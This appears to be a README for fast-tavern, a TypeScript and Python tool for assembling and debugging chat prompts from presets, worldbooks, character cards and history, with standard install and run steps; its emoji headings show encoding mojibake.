π fast-tavern - Simplifying Prompt Assembly for Everyone
π Getting Started
Welcome to fast-tavern! This application helps you assemble and debug prompts without needing any programming knowledge. Below, you will find detailed instructions to download and run the software easily.
π₯ Download

To download the application, please visit this link: Download fast-tavern.
π What You Will Get
- Prompt Assembly Logic: You can combine presets, worldbooks, character cards, and history into final messages without relying on any specific front-end framework.
- Multi-Stage Debug Output: View how your text changes at each stage:
raw
afterPreRegex (currently the same as raw)
afterMacro
afterPostRegex (final)
- Worldbook Activation and Injection: Using
always/keyword/vector, with support for probability and recursive control.
- Regex Script Data Implementation: This includes targets, views, trim, macros, depth controls, and more.
- Variable System: Supports local and global scopes, allowing operations such as
getvar, setvar, getglobalvar, and setglobalvar.
- Output Format Conversion: Convert outputs to different formats including
gemini, openai, tagged, and text.
π Repository Structure
Hereβs how the repository is organized:
fast-tavern/
npm-fast-tavern/ # TypeScript version
py-fast-tavern/ # Python version
π System Requirements
To run fast-tavern, ensure your system meets the following requirements:
- Operating System: Windows, macOS, or Linux
- RAM: Minimum 4 GB recommended
- Disk Space: At least 100 MB available
- Node.js (for TypeScript version): Version 12 or higher
- Python (for Python version): Version 3.6 or higher
π¦ Download & Install
Follow these steps to download and install fast-tavern:
- Click the download link at the top of this page or go to Download fast-tavern.
- Choose the version you want to download. You can select either the TypeScript or Python version based on your preference.
- Once the download completes, locate the file:
- For TypeScript: It will be in the
npm-fast-tavern/ directory.
- For Python: It will be in the
py-fast-tavern/ directory.
- Follow these installation instructions:
- For TypeScript:
- Open your command line tool.
- Navigate to the
npm-fast-tavern/ directory.
- Run
npm install to install necessary packages.
- For Python:
- Open your terminal.
- Navigate to the
py-fast-tavern/ directory.
- Run
pip install -r requirements.txt to get started.
π Running the Application
To run fast-tavern, follow these steps:
- TypeScript Version:
- In the command line, stay in the
npm-fast-tavern/ directory.
- Run
npm start.
- Python Version:
- In the terminal, navigate to the
py-fast-tavern/ directory.
- Run
python main.py.
π Support
If you face any issues or have questions, please check the following:
- Issue Tracker: Visit the GitHub Issues page to see if your question has been answered.
- Community Discussions: Join the community forums to ask questions and share ideas with other users.
π Additional Resources
For further information and tutorials, consider checking these resources:
Enjoy using fast-tavern!